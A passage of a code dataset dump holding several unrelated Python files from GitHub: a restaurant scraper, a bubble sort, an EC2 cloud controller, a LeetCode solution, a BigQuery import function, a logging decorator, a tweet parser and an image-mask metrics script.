return\n\n for result in response.css('li.resultItem'):\n id = result.css('li.resultItem::attr(data-restaurant-id)').extract_first()\n \n for info in result.css('div.resultItem-information h3'):\n url = info.css('a::attr(href)').extract_first()\n nombre = info.css('a::text').extract_first()\n\n direccion = self.trataCadenas(result.css('div.resultItem-address::text').extract_first())\n\n precioMedio = self.trataCadenas(result.css('div.resultItem-averagePrice::text').extract_first())\n\n valoracion = result.css('span.rating-ratingValue::text').extract_first()\n\n print('Id:',id,'Nombre:',nombre,'Url:',url, 'Dirección:', direccion, 'Precio medio:', precioMedio, 'Valoración:',valoracion)\n\n for next_page in response.css('li.next'):\n siguiente = next_page.css('a::attr(href)').extract_first()\n print(siguiente)\n\n def trataCadenas(self, pCadena):\n pCadena = pCadena.replace('\\n', '')\n pCadena = pCadena.strip()\n\n return pCadena","repo_name":"rvegas/kc_ej_bdarchitecture_scrapy_tenedor","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71333606293","text":"lst=[]\nn=int(input(\"enter the limit of list:\"))\n\nprint(\"enter the list elements:\",end=\" \")\nfor i in range(0,n):\n lst.append(int(input()))\nprint(\"input list:\",lst)\n\nfor i in range(0,n-1):\n for j in range(0,n-i-1):\n if(lst[j]>lst[j+1]):\n temp=lst[j]\n lst[j]=lst[j+1]\n lst[j+1]=temp\nprint(\"sorted lisit:\",lst)","repo_name":"fathimashibila/pythonluminar","sub_path":"luminarpythonprograms/looping/forloop/bubblesort.py","file_name":"bubblesort.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18710014173","text":" # coding: UTF-8\n #\n # Copyright 2014 by SCSK Corporation.\n #\n # This file is part of PrimeCloud Controller(TM).\n #\n # PrimeCloud Controller(TM) is free software: you can redistribute it and/or modify\n # it under the terms of the GNU General Public License as published by\n # the Free Software Foundation, either version 2 of the License, or\n # (at your option) any later version.\n #\n # PrimeCloud Controller(TM) is distributed in the hope that it will be useful,\n # but WITHOUT ANY WARRANTY; without even the implied warranty of\n # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n # GNU General Public License for more details.\n #\n # You should have received a copy of the GNU General Public License\n # along with PrimeCloud Controller(TM). If not, see .\n #\n\n\nfrom iaasgw.client.ec2iaasclient import EC2IaasClient\nfrom iaasgw.client.ec2iaasclientLB import EC2IaasClientLB\nfrom iaasgw.controller.ec2.ec2AddressController import ec2AddressController\nfrom iaasgw.controller.ec2.ec2InstanceController import ec2InstanceController\nfrom iaasgw.controller.ec2.ec2LoadBalancercontroller import \\\n ec2LoadBalancercontroller\nfrom iaasgw.controller.ec2.ec2OtherController import ec2OtherController\nfrom iaasgw.controller.ec2.ec2VolumController import ec2VolumController\nfrom iaasgw.controller.iaascontroller import IaasController\nfrom iaasgw.log.log import IaasLogger\nfrom iaasgw.utils.propertyUtil import getImage\nfrom iaasgw.utils.stringUtils import isNotEmpty, isBit\nimport traceback\n\n\nclass EC2Controller(IaasController):\n\n logger = IaasLogger()\n\n conn = None\n accessInfo = None\n\n client = None\n clientLb = None\n instancecontroller = None\n volumecontroller = None\n addresscontroller = None\n loadBalancercontroller = None\n othercontroller = None\n\n def __init__(self, conn, accessInfo, platforminfo, isLb = False):\n self.conn = conn\n self.accessInfo = accessInfo\n self.client = EC2IaasClient(platforminfo, accessInfo[\"USER_NAME\"], accessInfo[\"ACCESS_ID\"], accessInfo[\"SECRET_KEY\"])\n\n #コントローラ作成\n self.instancecontroller = ec2InstanceController(platforminfo, self.client, self.conn)\n self.volumecontroller = ec2VolumController(platforminfo, self.client, self.conn)\n self.addresscontroller = ec2AddressController(platforminfo, self.client, self.conn)\n self.othercontroller = ec2OtherController(platforminfo, self.client, self.conn)\n\n if isLb:\n #self.clientLb = ec2iaasclientLB(userInfo.getAccessId(), userInfo.getSecretKey)\n self.clientLb = EC2IaasClientLB(platforminfo, accessInfo[\"USER_NAME\"], accessInfo[\"ACCESS_ID\"], accessInfo[\"SECRET_KEY\"])\n #コントローラ作成\n self.loadBalancercontroller = ec2LoadBalancercontroller(platforminfo, self.clientLb, self.conn)\n\n def __del__(self):\n self.conn.rollback()\n self.conn.close()\n\n def startInstance(self, instanceNo):\n\n # インスタンスに関する処理 TODO タイムアウトリトライは未実装\n try:\n self.instancecontroller.startInstance(instanceNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n raise\n\n # ボリュームに関する処理\n table = self.conn.getTable(\"AWS_VOLUME\")\n volumes = self.conn.select(table.select(table.c.INSTANCE_NO==instanceNo))\n for volume in volumes:\n if isNotEmpty(volume[\"COMPONENT_NO\"]):\n # コンポーネント番号がある場合はスキップ\n continue\n #Volumeスタート\n self.volumecontroller.startVolume(instanceNo, volume[\"VOLUME_NO\"])\n\n # アドレスに関する処理\n self.addresscontroller.startAddress(instanceNo)\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def stopInstance(self, instanceNo):\n\n try :\n # アドレスに関する処理\n self.addresscontroller.stopAddress(instanceNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n\n try :\n # インスタンスに関する処理\n self.instancecontroller.stopInstance(instanceNo);\n except Exception:\n self.logger.error(traceback.format_exc())\n\n try :\n # ボリュームに関する処理\n tableAWSVOL = self.conn.getTable(\"AWS_VOLUME\")\n volumes = self.conn.select(tableAWSVOL.select(tableAWSVOL.c.INSTANCE_NO==instanceNo))\n\n #PCC_INSTANCE 取得\n tableINS = self.conn.getTable(\"INSTANCE\")\n pccInstance = self.conn.selectOne(tableINS.select(tableINS.c.INSTANCE_NO==instanceNo))\n\n #イメージの取得 再考の余地あり\n image = getImage(pccInstance[\"IMAGE_NO\"])\n\n for awsVolume in volumes:\n if (image[\"ebsImage\"]==\"true\"):\n self.volumecontroller.stopVolume(instanceNo, awsVolume[\"VOLUME_NO\"])\n else:\n if (isNotEmpty(awsVolume[\"VOLUME_ID\"]) and isNotEmpty(awsVolume[\"INSTANCE_ID\"])):\n updateDict = self.conn.selectOne(tableAWSVOL.select(tableAWSVOL.c.VOLUME_NO==awsVolume[\"VOLUME_NO\"]))\n updateDict[\"STATUS\"] = None\n updateDict[\"INSTANCE_ID\"] = None\n sql = tableAWSVOL.update(tableAWSVOL.c.VOLUME_NO ==updateDict[\"VOLUME_NO\"], values=updateDict)\n self.conn.execute(sql)\n except Exception:\n self.logger.error(traceback.format_exc())\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def terminateInstance(self, instanceId):\n\n #1度も起動されていない\n if instanceId is None:\n return\n\n #AWS_INSTANCE 取得\n tableAWSINS = self.conn.getTable(\"AWS_INSTANCE\")\n awsInstance = self.conn.selectOne(tableAWSINS.select(tableAWSINS.c.INSTANCE_ID==instanceId))\n\n # インスタンスの停止\n change = self.client.terminateInstance(instanceId);\n\n # データベース更新\n awsInstance[\"STATUS\"] = change[\"name\"]\n sql = tableAWSINS.update(tableAWSINS.c.INSTANCE_NO ==awsInstance[\"INSTANCE_NO\"], values=awsInstance)\n self.conn.execute(sql)\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def startVolume(self, instanceNo, volumeNo):\n self.volumecontroller.startVolume(instanceNo, volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def stopVolume(self, instanceNo, volumeNo):\n self.volumecontroller.stopVolume(instanceNo, volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteVolume(self, volumeId):\n self.client.deleteVolume(volumeId)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def startLoadBalancer(self, loadBalancerNo):\n tableLB = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = self.conn.selectOne(tableLB.select(tableLB.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n\n # ゾーン情報の取得\n zones = self.client.describeAvailabilityZones()\n\n # サブネットID\n subnets = self.client.describeSubnets()\n\n # セキュリティグループ\n groups = self.client.describeSecurityGroups()\n groupmap = {}\n for group in groups:\n if group.vpcId is not None:\n key = group.groupName+group.vpcId\n groupmap.update({key:group.groupId})\n\n # ロードバランサの作成\n self.loadBalancercontroller.createLoadBalancer(loadBalancer[\"FARM_NO\"], loadBalancerNo, zones, subnets, groupmap)\n\n # DNSサーバへの追加 ここは未定\n #self.loadBalancercontroller.addDns(loadBalancerNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def stopLoadBalancer(self, loadBalancerNo):\n tableLB = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = self.conn.selectOne(tableLB.select(tableLB.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n # DNSサーバからの削除\n #self.loadBalancercontroller.deleteDns(loadBalancerNo);\n\n # ロードバランサの削除\n self.loadBalancercontroller.deleteLoadBalancer(loadBalancer[\"FARM_NO\"],loadBalancerNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def configureLoadBalancer(self, loadBalancerNo):\n table = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = self.conn.selectOne(table.select(table.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n # リスナーの設定\n try :\n self.loadBalancercontroller.configureListeners(loadBalancer[\"FARM_NO\"], loadBalancerNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # ヘルスチェックの設定\n try :\n self.loadBalancercontroller.configureHealthCheck(loadBalancer[\"FARM_NO\"], loadBalancerNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # セキュリティグループの設定\n try :\n # サブネットID\n subnets = self.client.describeSubnets()\n\n # セキュリティグループ\n groups = self.client.describeSecurityGroups()\n groupmap = {}\n for group in groups:\n if group.vpcId is not None:\n key = group.groupName+group.vpcId\n groupmap.update({key:group.groupId})\n\n self.loadBalancercontroller.applySecurityGroupsToLoadBalancer(loadBalancer[\"FARM_NO\"], loadBalancerNo, groupmap, subnets)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # インスタンスの振り分け設定\n try :\n self.loadBalancercontroller.configureInstances(loadBalancer[\"FARM_NO\"], loadBalancerNo);\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n self.logger.info(None, \"IPROCESS-200106\", [loadBalancerNo, loadBalancer[\"LOAD_BALANCER_NAME\"]])\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def allocateAddress(self):\n publicIp = None\n platformNo = self.client.getPlatformNo()\n\n tablePLAWS = self.conn.getTable(\"PLATFORM_AWS\")\n awsPlatform = self.conn.selectOne(tablePLAWS.select(tablePLAWS.c.PLATFORM_NO==platformNo))\n\n if awsPlatform[\"VPC\"] == 1:\n #VPC用のElasticIP発行処理呼び出し\n publicIp = self.client.allocateVpcAddress()\n else:\n #ElasticIP発行処理呼び出し\n publicIp = self.client.allocateAddress()\n\n #イベントログ出力\n self.conn.debug(None, None, None, None, None, \"AwsElasticIpAllocate\", [\"EC2\", publicIp])\n\n #DBへ登録\n table = self.conn.getTable(\"AWS_ADDRESS\")\n sql = table.insert({\"ADDRESS_NO\":None,\n \"USER_NO\":self.accessInfo[\"USER\"],\n \"PLATFORM_NO\":platformNo,\n \"PUBLIC_IP\":publicIp,\n \"COMMENT\":None,\n \"INSTANCE_NO\":None,\n \"INSTANCE_ID\":None})\n self.conn.execute(sql)\n\n newAddress = self.conn.selectOne(table.select(table.c.PUBLIC_IP==publicIp))\n\n self.conn.commit()\n return \"RESULT:\" + str(newAddress[\"ADDRESS_NO\"])\n\n def releaseAddress(self, addressNo):\n platformNo = self.client.getPlatformNo()\n\n tablePLAWS = self.conn.getTable(\"PLATFORM_AWS\")\n awsPlatform = self.conn.selectOne(tablePLAWS.select(tablePLAWS.c.PLATFORM_NO==platformNo))\n\n table = self.conn.getTable(\"AWS_ADDRESS\")\n address = self.conn.selectOne(table.select(table.c.ADDRESS_NO==addressNo))\n\n if not address:\n return\n\n ipaddress = address[\"PUBLIC_IP\"]\n instanceId = address[\"INSTANCE_ID\"]\n instanceNo = address[\"INSTANCE_NO\"]\n\n if awsPlatform[\"VPC\"] == 1:\n #アドレス情報取得\n address = self.client.describeAddress(ipaddress)\n #VPC用のElasticIP解放処理呼び出し\n self.client.releaseVpcAddress(ipaddress, address.allocationId)\n else:\n #ElasticIP解放処理呼び出し\n self.client.releaseAddress(ipaddress)\n\n #イベントログ\n self.conn.debug(None, None, None, None, None, \"AwsElasticIpRelease\", [\"EC2\", ipaddress])\n\n #DBから削除\n table.delete(table.c.ADDRESS_NO==addressNo).execute()\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def describeSnapshot(self, snapshotId):\n snapshots = self.othercontroller.describeSnapshot(snapshotId)\n rtString = ''\n for snapshot in snapshots:\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず全部\n rtString = rtString + snapshot.snapshotId + '#' \\\n + snapshot.volumeId + '#' \\\n + snapshot.status + '#' \\\n + snapshot.startTime + '#' \\\n + snapshot.progress + '#' \\\n + snapshot.ownerId + '#' \\\n + snapshot.volumeSize + '#' \\\n + snapshot.description + '#' \\\n + snapshot.tagSet\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n\n def createSnapshot(self, volumeNo):\n self.othercontroller.createSnapshot(volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteSnapshot(self, snapshotNo):\n self.othercontroller.deleteSnapshot(snapshotNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def getPasswordData(self, instanceNo):\n passwordData = self.othercontroller.getPasswordData(instanceNo)\n self.conn.commit()\n return \"RESULT:\" + passwordData\n\n def describeKeyPairs(self):\n keypairs = self.client.describeKeyPairs()\n rtString = ''\n for keypair in keypairs:\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + keypair.keyName\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n def createKeyPair(self, keyName):\n self.client.createKeyPair(keyName)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteKeyPair(self, keyName):\n self.client.deleteKeyPair(keyName)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def importKeyPair(self, keyName, publicKeyMaterial):\n keyPair = self.client.importKeyPair(keyName, publicKeyMaterial)\n\n keyFingerprint = keyPair.keyFingerprint\n self.conn.commit()\n return \"RESULT:\" + keyFingerprint\n\n def describeSecurityGroups(self, vpcid = None):\n groups = self.client.describeSecurityGroups()\n rtString = ''\n for group in groups:\n #VPCIDが一致する物以外は除外\n if vpcid is not None:\n if vpcid != group.vpcId:\n continue\n #VPCID未入力時はVPCIDが設定されていない物のみ使用\n else:\n if group.vpcId is not None:\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + group.groupName\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n def describeAvailabilityZones(self):\n zones = self.client.describeAvailabilityZones()\n\n #available\n rtString = ''\n for zone in zones:\n #有効な物のみ利用する\n if zone.zone_state != \"available\":\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します IDに相当するパラメータが無い為NONEを入れておく\n rtString = rtString + zone.name + \"#NONE\"\n self.conn.commit()\n #出力として返す\n return \"RESULT:\" + rtString\n\n\n def describeSubnets(self, vpcid = None):\n subnets = self.client.describeSubnets()\n rtString = ''\n for subnet in subnets:\n if vpcid is not None:\n if vpcid != subnet.vpcId:\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + subnet.subnetId + '#' + subnet.availabilityZone+ '#' + subnet.cidrBlock\n self.conn.commit()\n return \"RESULT:\" + rtString\n","repo_name":"primecloud-controller-org/primecloud-controller","sub_path":"iaas-gw/src/iaasgw/controller/ec2/ec2controller.py","file_name":"ec2controller.py","file_ext":"py","file_size_in_byte":17455,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"67"} +{"seq_id":"5359603347","text":"class Solution:\n def longestIncreasingPath(self, matrix: [[]]) -> int:\n if not matrix:\n return 0\n visited: [[]] = [[0 for _ in range(len(matrix[0]))] for _ in range(matrix)]\n max_v = -10 ** 7\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n cur_len = self.fin_longest_len(matrix, visited, i, j, -10 ** 7)\n max_v = max(max_v, cur_len)\n return max_v\n\n def fin_longest_len(self, matrix, visited, i, j, pre):\n if not 0 <= i < len(matrix) or not 0 <= j < len(matrix[0]) or matrix[i][j] <= pre:\n return 0\n if visited[i][j] != 0:\n return visited[i][j]\n cur = matrix[i][j]\n up = self.fin_longest_len(matrix, visited, i - 1, j, cur)\n down = self.fin_longest_len(matrix, visited, i + 1, j, cur)\n lf = self.fin_longest_len(matrix, visited, i, j - 1, cur)\n rt = self.fin_longest_len(matrix, visited, i, j + 1, cur)\n visited[i][j] = max(up, down, lf, rt) + 1\n return visited[i][j]\n","repo_name":"jack12356/leetcode2021","sub_path":"Nicco的高级算法python/c_8_longestIncreasingPath.py","file_name":"c_8_longestIncreasingPath.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23492866593","text":"import functions_framework\nimport os\nimport io\nimport re\nimport pandas as pd\nimport datetime\nfrom google.cloud import storage\nfrom google.cloud import bigquery\n\nPROJECT_ID = os.environ.get('GCP_PROJECT', '')\nGCS_BUCKET = os.environ.get('GCS_BUCKET_NAME', '')\nBQ_DATASET = os.environ.get('BQ_DATASET_ID', '')\nBQ_TABLE = os.environ.get('BQ_TABLE_NAME', '')\n\ndef read_from_gcs(bucket, file):\n client = storage.Client(\n project=PROJECT_ID\n )\n bucket = client.get_bucket(bucket)\n blob = bucket.blob(file)\n data = blob.download_as_text()\n\n return data\n\ndef clean_data(datastr):\n # stupid \\r\\n line terminator poses a problem for dataframe.read_csv which only allows 1 char\n data = datastr.replace('\\r\\n', '\\n') \n strio = io.StringIO(data)\n df = pd.read_csv(\n strio, \n dtype=str, # keep the leading 0,\n sep=',', \n header=0, \n lineterminator='\\n')\n\n # fix column names\n df.columns = df.columns.str.replace(' ', '_')\n df.columns = df.columns.str.lower()\n\n # remove special chars from numbers\n df['eligibles'] = df['eligibles'].str.replace(',', '')\n df['enrolled'] = df['enrolled'].str.replace(',', '')\n df['penetration'] = df['penetration'].str.replace('%', '')\n \n # convert into int type\n df['eligibles'] = pd.to_numeric(df['eligibles'], errors='coerce').astype('Int64')\n df['enrolled'] = pd.to_numeric(df['enrolled'], errors='coerce').astype('Int64')\n df['penetration'] = pd.to_numeric(df['penetration'], errors='coerce').astype('float')\n\n # have to scrub bad data from data source\n return df[df['state_name'].str.contains('Pending State Designation')==False]\n\ndef import_df(df, table_id):\n client = bigquery.Client(\n project=PROJECT_ID\n )\n job_config = bigquery.LoadJobConfig(\n # overrides BQ default schema detection for these columns\n schema=[\n bigquery.SchemaField(\"fipsst\", \"STRING\"),\n bigquery.SchemaField(\"fipscnty\", \"STRING\"),\n bigquery.SchemaField(\"fips\", \"STRING\"),\n bigquery.SchemaField(\"ssast\", \"STRING\"),\n bigquery.SchemaField(\"ssacnty\", \"STRING\"),\n bigquery.SchemaField(\"ssa\", \"STRING\")\n ],\n write_disposition=\"WRITE_TRUNCATE\"\n )\n job = client.load_table_from_dataframe(\n df, \n table_id, \n job_config=job_config\n )\n job.result()\n table = client.get_table(table_id)\n print(f'Loaded {table.num_rows} into {table_id}')\n\ndef import_csv_to_bq(gsurl, table_id):\n client = bigquery.Client(\n project=PROJECT_ID\n )\n job_config = bigquery.LoadJobConfig(\n autodetect=True,\n source_format=bigquery.SourceFormat.CSV\n )\n load_job = client.load_table_from_uri(\n gsurl, table_id, job_config=job_config\n )\n load_job.result()\n dest_table = client.get_table(table_id)\n print(f'Loaded {dest_table.num_rows} rows from {gsurl}')\n\n@functions_framework.cloud_event\ndef handle_gcs_event(cloud_event):\n data = cloud_event.data\n bucket = data['bucket']\n file = data['name']\n\n try:\n #include '.csv' JUST IN CASE we encounter another \\d{4}_\\d{2} in the file name\n dt_str = re.findall(r'\\d{4}_\\d{2}.csv', file)[0].replace('.csv', '')\n file_dt = datetime.datetime.strptime(dt_str, '%Y_%m')\n # add '01' at the end to enable bq to index tables by date; needs YYYYMMDD format\n fmt_dt = file_dt.strftime('%Y%m01')\n table_id = f'{PROJECT_ID}.{BQ_DATASET}.{BQ_TABLE}_{fmt_dt}'\n\n data = read_from_gcs(bucket, file)\n df = clean_data(data)\n import_df(df, table_id)\n except Exception as e:\n print(e)\n ","repo_name":"wilwang/gcp-func-sample","sub_path":"import-to-bq/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"11501685803","text":"'''\nИз букв слова Р А Д У Г А составляются 6-буквенные последовательности. Сколько можно составить различных последовательностей,\nесли известно, что в каждой из них содержится не менее 3 согласных?\n'''\nfrom itertools import product\nwords = product('радуг', repeat=6)\nk = 0\nfor w in words:\n word = ''.join(w)\n if (word.count('р') + word.count('д') + word.count('г')) >= 3:\n k += 1\nprint(k)\n","repo_name":"plugarivan/ege_2023","sub_path":"task8/8-6.py","file_name":"8-6.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"19921270203","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/11/10 13:52\r\n# @Author : Zhu Shidong\r\n# @Site : \r\n# @File : log_decorator.py\r\n# @Software: PyCharm\r\n# @Function:\r\nimport logging\r\nimport const\r\nfrom functools import wraps\r\nimport time\r\n\r\n\r\nfmt = \"%(asctime)s - %(levelname)s - %(message)s\"\r\nerr_fmt = \"%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s\"\r\ndate_fmt = \"%Y-%b-%d %H:%M:%S\"\r\n\r\nlogger = logging.getLogger(\"my_logger\")\r\nlogger.setLevel(logging.DEBUG)\r\nformatter = logging.Formatter(fmt, date_fmt)\r\nhandler = logging.FileHandler(const.LOG_FILE)\r\nhandler.setFormatter(formatter)\r\nlogger.addHandler(handler)\r\n\r\ndef log_decorator(func):\r\n \"\"\"\r\n 日志修饰器\r\n :param func:\r\n :return:\r\n \"\"\"\r\n @wraps(func)\r\n def with_logger(*args, **kwargs):\r\n func_name = func.__name__\r\n arg_names = func.func_code.co_varnames[:func.func_code.co_argcount] # 参数name\r\n params_str = func_name + \"(\" + ', '.join(\r\n '%s=%r' % entry\r\n for entry in\r\n zip(arg_names, args[:len(arg_names)]) + [(\"args\", list(args[len(arg_names):]))] + [(\"kwargs\", kwargs)]) + \")\"\r\n logger.debug(params_str)\r\n # print params_str\r\n try:\r\n out = func(*args, **kwargs)\r\n return out\r\n except:\r\n logger.exception(\r\n 'exec func {func_name} failed'.format(func_name=func.__name__))\r\n logger.info('done exec func %s' % func.__name__)\r\n return with_logger\r\n\r\n\r\ndef exec_time_decorator(func):\r\n \"\"\"\r\n 日志修饰器\r\n :param func:\r\n :return:\r\n \"\"\"\r\n @wraps(func)\r\n def time_logger(*args, **kwargs):\r\n func_name = func.__name__\r\n arg_names = func.func_code.co_varnames[:func.func_code.co_argcount] # 参数name\r\n params_str = func_name + \"(\" + ', '.join(\r\n '%s=%r' % entry\r\n for entry in\r\n zip(arg_names, args[:len(arg_names)]) + [(\"args\", list(args[len(arg_names):]))] + [(\"kwargs\", kwargs)]) + \")\"\r\n logger.debug(params_str)\r\n # print params_str\r\n use_time = 0\r\n try:\r\n start_time = time.time()\r\n out = func(*args, **kwargs)\r\n end_time = time.time()\r\n use_time = str(end_time-start_time)\r\n logger.debug('exec func {params_str} with time: {exec_time}'.format(\r\n params_str=params_str, exec_time=use_time))\r\n return out\r\n except:\r\n logger.exception(\r\n 'exec func {func_name} failed'.format(func_name=func.__name__))\r\n logger.debug('exec func {params_str} with time: {exec_time}'.format(\r\n params_str=params_str, exec_time=use_time))\r\n return time_logger\r\n\r\n\r\n@log_decorator\r\ndef test(filename, *args, **kwargs):\r\n pass\r\n\r\nif __name__ == '__main__':\r\n test('1.txt',(0,1,1,3), aa={'a':1, 'b':2})","repo_name":"DemonZSD/thread_demo","sub_path":"utils/log_decorator.py","file_name":"log_decorator.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35263335427","text":"import json\nimport datetime as dt\nimport logging as log\nfrom tweet import Tweet\nfrom twitteruser import TwitterUser\n\n\nclass TweetScraperService(object):\n def scrape_file(self, file_path):\n \"\"\"deserialize file of json tweets and return list with relevant fields\n\n :rtype: list\n :param file_path: filepath to file of json tweets\n :return: tweet_list: list of tweet maps with relevant fields. If file cannot be opened return None\n \"\"\"\n try:\n \"\"\"open file specified in file_path \"\"\"\n file_lines = self.__open_file(file_path)\n except IOError as io:\n \"\"\"If file cannot be opened return None\"\"\"\n return None\n \"\"\"serialize list of lines to a list of tweet maps \"\"\"\n tweet_list = self.scrape_tweet_lines(file_lines)\n return tweet_list\n\n def scrape_tweet_lines(self, raw_tweet_lines):\n\n \"\"\" Iterate through lines of tweet json and return list of tweet maps\n\n :param raw_tweet_lines: list of lines from tweets file in json format\n :return list of tweets mapped for relevant fields :\n \"\"\"\n error_count = 0\n \"\"\"list to collect tweets in\"\"\"\n tweets_map_list = []\n \"\"\"strip data from each tweet in file \"\"\"\n for line in raw_tweet_lines:\n \"\"\"strip relevant fields and make map\"\"\"\n mapped_tweet = self.map_tweet_user(line)\n tweets_map_list.append(mapped_tweet)\n return tweets_map_list\n\n @staticmethod\n def deserialize_tweet(raw_tweet):\n \"\"\"\n :param raw_tweet:\n :return Tweet:\n\n \"\"\"\n tweet = Tweet()\n full_tweet = json.loads(raw_tweet)\n\n try:\n \"\"\"map relevant fields to object\"\"\"\n tweet.text = full_tweet['text']\n tweet.favorites = full_tweet['user']['favourites_count']\n tweet.retweets = full_tweet['retweet_count']\n tweet.in_reply_to_status_id = full_tweet['in_reply_to_status_id']\n tweet.in_reply_to_user_id = full_tweet['in_reply_to_user_id']\n tweet.user_id = full_tweet['user']['id']\n datetime = dt.datetime.strptime(full_tweet['created_at'], '%a %b %d %H:%M:%S %z %Y')\n tweet.create_datetime = datetime\n except KeyError as ke:\n log.warning('Could not map tweet: '.format(ke))\n except Exception as inst:\n print(inst)\n return tweet\n\n @staticmethod\n def deserialize_user(raw_tweet):\n \"\"\"\n :param raw_tweet:\n :return TwitterUser:\n \"\"\"\n user = TwitterUser()\n full_tweet = json.loads(raw_tweet)\n try:\n user.user_id = full_tweet['user']['id']\n user.user_name = full_tweet['user']['name']\n user.screen_name = full_tweet['user']['screen_name']\n user.location = full_tweet['user']['location']\n user.followers = full_tweet['user']['followers_count']\n except KeyError as ke:\n log.warning('Could not map user: '.format(ke))\n return user\n\n def map_tweet_user(self, full_tweet):\n \"\"\"process a tweet tuple and map relevant fields\n\n :rtype namedtuple{Tweet, TwitterUser}\n :param full_tweet: tweet as text\n :return: map of a Tweet and TwitterUser\n \"\"\"\n tweet_user_map = {}\n tweet_user_map['tweet'] = self.deserialize_tweet(full_tweet)\n tweet_user_map['user'] = self.deserialize_user(full_tweet)\n return tweet_user_map\n\n def __open_file(self, file_path):\n \"\"\" Open a file given a file path and return lines in file as a list\n\n :rtype: list\n :param file_path: path of file to be opened\n :return: list of all lines contained in the file specified by file_path\n :except: IOError: if file_path is incorrect or file cannot be opened\n \"\"\"\n try:\n \"\"\"open file from given filepath\"\"\"\n raw_file = open(file_path)\n \"\"\"make a list of the lines contained in the file\"\"\"\n file = raw_file.readlines()\n return file\n except IOError as io:\n log.warning(\"Could not open {}\\n {}\".format(file_path, type(io)))\n raise io\n\n\nif __name__ == '__main__':\n file_path = 'data/twitter_data.txt'\n scraper_service = TweetScraperService()\n tweet_list = scraper_service.scrape_file(file_path)\n print(tweet_list)\n","repo_name":"johnStauffer/Donary_Clintump","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7266869836","text":"import cv2\nimport numpy as np\nimport os\n\ndef calcola_metriche(veri_positivi, falsi_positivi, falsi_negativi, veri_negativi):\n # Calcola la precisione\n precision = veri_positivi / (veri_positivi + falsi_positivi)\n\n # Calcola il recall\n recall = veri_positivi / (veri_positivi + falsi_negativi)\n\n # Calcola l'F1-score\n f1_score = 2 * (precision * recall) / (precision + recall)\n\n # Calcola l'accuratezza\n accuracy = (veri_positivi + veri_negativi) / (veri_positivi + veri_negativi + falsi_positivi + falsi_negativi)\n\n return precision, recall, f1_score, accuracy\n\nveri_positivi=0\nveri_negativi=0\nfalsi_positivi=0\nfalsi_negativi=0\ni=0\ncartella1 = r\"C:\\Users\\Sabino\\Desktop\\sistemi multimediali\\database_sclere\\original size mask\"\ncartella2 = r\"C:\\Users\\Sabino\\Desktop\\sistemi multimediali\\database_sclere\\maschere_tesiInglese OS\"\n\n# Ottieni la lista dei file nelle due 